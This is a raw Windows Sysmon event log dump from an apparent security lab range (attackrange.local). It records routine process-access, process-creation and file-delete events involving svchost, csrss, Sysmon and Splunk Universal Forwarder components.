07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F314-60EB-4379-00000000D001}2312C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F314-60EB-4379-00000000D001}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.767{0C1E0330-F314-60EB-4379-00000000D001}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB3BD49C72131FB82AA54B5E2139646,SHA256=6C358A688465CD581782880AB29B6D9FC9E4E7F153A137D296D8A30BE69E02D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F314-60EB-4279-00000000D001}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F314-60EB-4279-00000000D001}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F314-60EB-4279-00000000D001}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.220{0C1E0330-F314-60EB-4279-00000000D001}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:25.621{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=481C3EF4A23F91119FA7676384D4C03E,SHA256=104D0322832975DC76496D1454B72DF7D475DFE423B45B976A50762D382E38EB,IMPHASH=00000000000000000000000000000000falsetrue 
